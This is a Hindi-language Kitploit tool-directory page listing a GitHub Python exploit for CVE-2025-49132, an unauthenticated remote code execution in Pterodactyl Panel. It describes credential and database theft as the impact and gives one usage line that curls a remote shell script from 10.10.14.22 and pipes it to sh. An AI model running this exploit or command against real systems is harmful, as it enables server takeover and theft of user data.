Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49132 — CVE-2025-49132 के लिए Python एक्सप्लॉइट, जो गढ़े गए लोकेल और नाम स्थान पैरामीटरों के माध्यम से Pterodactyl Panel पर अप्रमाणित दूरस्थ कोड निष्पादन सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/scroollocker/cve-2025-49132
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubscroollocker/cve-2025-49132

CVE-2025-49132

CVE-2025-49132 के लिए Python एक्सप्लॉइट, जो गढ़े गए लोकेल और नाम स्थान पैरामीटरों के माध्यम से Pterodactyl Panel पर अप्रमाणित दूरस्थ कोड निष्पादन सक्षम करता है।

रिपॉजिटरी देखें
97 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रभाव

/locales/locale.json में locale और namespace क्वेरी पैरामीटर्स का उपयोग करके, एक दुर्भावनापूर्ण अभिनेता बिना प्रमाणीकरण के मनमाना कोड निष्पादित करने में सक्षम होता है।

मनमाना कोड निष्पादित करने की क्षमता के साथ, इस कमजोरी का अनगिनत तरीकों से शोषण किया जा सकता है। इसका उपयोग पैनल के सर्वर तक पहुँच प्राप्त करने, पैनल के कॉन्फ़िग (.env या अन्य) से क्रेडेंशियल्स पढ़ने, डेटाबेस से संवेदनशील जानकारी (जैसे उपयोगकर्ता विवरण [उपयोगकर्ता नाम, ईमेल, प्रथम और अंतिम नाम, हैशेड पासवर्ड, आईपी पते, आदि]) निकालने, पैनल द्वारा प्रबंधित सर्वरों की फ़ाइलों तक पहुँचने आदि के लिए किया जा सकता है।

How to use


python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

टूल डाउनलोड करें